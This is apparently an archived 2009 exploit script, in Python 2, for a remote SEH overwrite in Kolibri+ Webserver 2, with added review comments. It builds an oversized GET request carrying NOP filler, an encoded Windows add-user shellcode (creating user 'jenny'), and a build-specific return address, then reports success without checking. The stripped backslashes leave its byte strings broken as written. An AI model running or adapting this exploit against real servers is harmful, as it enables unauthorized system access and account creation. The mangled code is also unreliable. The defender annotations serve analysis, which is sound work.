
# Title : Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit
# Published : 2009-09-11
# Author : Blake


#!/usr/bin/python
#
# Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret
# to work correctly despite the large number of usable addresses that were tested.
#
# $ ./kolibri.py 192.168.1.146 8080
#
# [*] Kolibri+ Webserver 2 SEH Overwrite
# [*] Written by blake
# [*] Tested on Windows XP SP 1
# [*] Denial of Service found by Usman Saeed
#
# [+] Connecting to 192.168.1.146 on port 8080
# [+] Sending payload
# [+] Done. User jenny created with the password of pass on 192.168.1.146

import socket, sys

# NOTE(review): Python 2 syntax throughout (print statements, bare except).
# In this copy of the script every backslash has been stripped from the
# string literals, so "x41" is three printable characters rather than one
# byte, and "n" / "rnrn" are plain letters rather than line endings; the
# byte counts quoted in the comments below describe the original, not this
# text.
print "n[*] Kolibri+ Webserver 2 SEH Overwrite"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP 1"
print "[*] Denial of Service found by Usman Saeedn"

# Exactly two positional arguments are required.  The usage string carries a
# %s placeholder but is never %-formatted, so it is printed literally.
if len(sys.argv)!= 3:
	print "[*] Usage: %s <ip> <port>"
	sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # unhandled ValueError if the port is not numeric

# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
#
# Adjacent string literals are concatenated into a single value.  Per the
# line above this is an alpha_mixed-encoded payload: apart from a short
# non-printable decoder stub at the start, the bulk is printable
# alphanumerics (x41-x5a, x30-x39), presumably so it survives inside a URL
# path.  On the defender's side the observable is one GET request whose
# path is roughly 900 bytes (using the sizes given in the comments below)
# of filler plus alphanumeric runs, sent with no request headers at all
# (see the send() call further down).
shellcode = (
"x89xe6xdbxc8xd9x76xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx4bx58x47x34x45x50x43x30x43x30x4cx4bx50"
"x45x47x4cx4cx4bx43x4cx43x35x42x58x43x31x4ax4f"
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4a"
"x4bx50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31"
"x49x50x4cx59x4ex4cx4bx34x49x50x44x34x45x57x49"
"x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47x4b"
"x51x44x51x34x45x54x43x45x4ax45x4cx4bx51x4fx46"
"x44x45x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45"
"x51x4ax4bx4bx39x51x4cx47x54x45x54x49x53x51x4f"
"x50x31x4ax56x43x50x50x56x45x34x4cx4bx50x46x50"
"x30x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4ex4d"
"x4cx4bx43x58x45x58x4dx59x4ax58x4cx43x49x50x42"
"x4ax50x50x45x38x4cx30x4cx4ax44x44x51x4fx43x58"
"x4ax38x4bx4ex4cx4ax44x4ex46x37x4bx4fx4ax47x42"
"x43x42x4dx43x54x46x4ex43x55x43x48x43x55x51x30"
"x46x4fx42x43x51x30x42x4ex42x45x44x34x47x50x44"
"x35x42x53x45x35x43x42x51x30x43x5ax43x55x42x4e"
"x42x4ex43x49x47x50x42x50x43x51x43x43x43x43x51"
"x30x46x4fx51x51x51x54x51x54x51x30x51x36x47x56"
"x47x50x42x4ex45x35x44x34x47x50x42x4cx42x4fx43"
"x53x43x51x42x4cx43x57x42x52x42x4fx42x55x44x30"
"x51x30x51x51x45x34x42x4dx42x49x42x4ex45x39x44"
"x33x44x34x43x42x43x51x44x34x42x4fx42x52x43x43"
"x47x50x43x5ax45x35x42x4ex42x4ex43x49x51x30x46"
"x4fx47x31x51x54x47x34x43x30x41x41")

# Request-path layout, in send() order: filler, NOP sled, shellcode, a near
# jump back over the shellcode, then the overwritten SEH record (next-SEH
# short jump followed by the handler address), then trailing filler.  The
# handler address is a hard-coded kernel32.dll location, so it is tied to
# the exact Windows build the header says this was tested on (XP SP1); the
# header also notes it did not work on SP3.
payload = "x41" * 8			# junk buffer (8 bytes in the original encoding)
payload += "x90" * 10			# nop sled
sc = shellcode				# 446 bytes of shellcode (original encoding)
jump_near = "xe9x34xfexffxff"	# jump near -460 bytes
next_seh = "xebxf9xffxff"		# short jump back -7 bytes
seh = "x6fx2axe6x77"		# p/p/r from kernel32.dll (build-specific address)
junk = "x41" * 424			# junk buffer

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((host,port))
	print "[+] Sending payload"
	# A single HTTP/1.0 request line and nothing else.  The response is never
	# read, so the "Done" message below is printed regardless of what the
	# server actually did with the request.
	s.send("GET /index.html" + payload + sc + jump_near + next_seh + seh + junk + " HTTP/1.0rnrn")
	s.close()
	print "[+] Done. User jenny created with the password of pass on %sn" % host
except:
	# Bare except: any failure in connect(), send() or the prints (including
	# KeyboardInterrupt) lands here and is reported as a connection failure;
	# the socket is not closed on this path.
	print "[x] Could not connect!"
